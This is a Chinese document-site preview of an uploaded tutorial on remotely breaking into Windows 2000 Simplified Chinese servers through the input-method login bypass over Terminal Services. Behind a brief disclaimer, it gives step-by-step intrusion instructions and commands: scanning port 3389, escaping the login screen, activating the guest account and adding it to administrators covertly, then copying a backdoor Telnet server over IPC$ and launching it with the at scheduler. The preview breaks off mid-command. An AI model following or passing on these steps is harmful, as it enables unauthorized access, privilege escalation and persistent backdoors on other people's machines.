返回
win2000中文简体版输入法漏洞远程入侵攻略

win2000中文简体版输入法漏洞远程入侵攻略

ID:8978948

大小:24.50 KB

页数:2页

时间:2018-04-13

win2000中文简体版输入法漏洞远程入侵攻略_第1页
win2000中文简体版输入法漏洞远程入侵攻略_第2页
资源描述:

《win2000中文简体版输入法漏洞远程入侵攻略》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、WIN2000中文简体版输入法漏洞远程入侵攻略           注:本文目的在于提醒网管注意,加强网管网络安全意识,提高网管网络安全技术水平,并不赞同用此法进行违法犯罪活动。WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了

2、WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。工具:客户端连接管理器,下载地址:http://minisql.51.net/rj/WIN.zip,端口扫描器一个,推荐使用:流光、网络刺客2、superscan。入侵步骤:一,获得管理员账号。我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃

3、,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:winntsystem32

4、"。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:winntsystem32et.exe后面空一格,填入"userguest/active:yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快

5、捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"userguest密码",运行,于是guest便有了密码。最后,再次修改,填入“localgroupadministratorsguest/add,将guest变成系统管理员。注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。3、你所看到的图像与操作

6、会有所延迟,这受网速的影响。二,创建跳板。再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。退出对方系统,在本地机命令提示符下,输入netuse\IPAddressIPC$["password"]/user:"guset",通过IPC的远程登陆就成功了。登陆成功

7、之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。copyc:hacksrv.exe\***.***.***.***admin$然后利用定时服务启动它,先了解对方的时间:nettime\***.***.***.***显示:\***.***.***.***的当前时间是2001/1/8下午08:55命令成功完成。然后启动srv.exe:at\***.***.***.***09

8、:00srv.exe 显示:新加了一项作业,其作业ID=0过几分钟后,telnet***.***.***.***99这里不需要验证身份,直接登录,显示:c:winnt:system32>我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:copyc:hacktlm.exe\211.21.

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。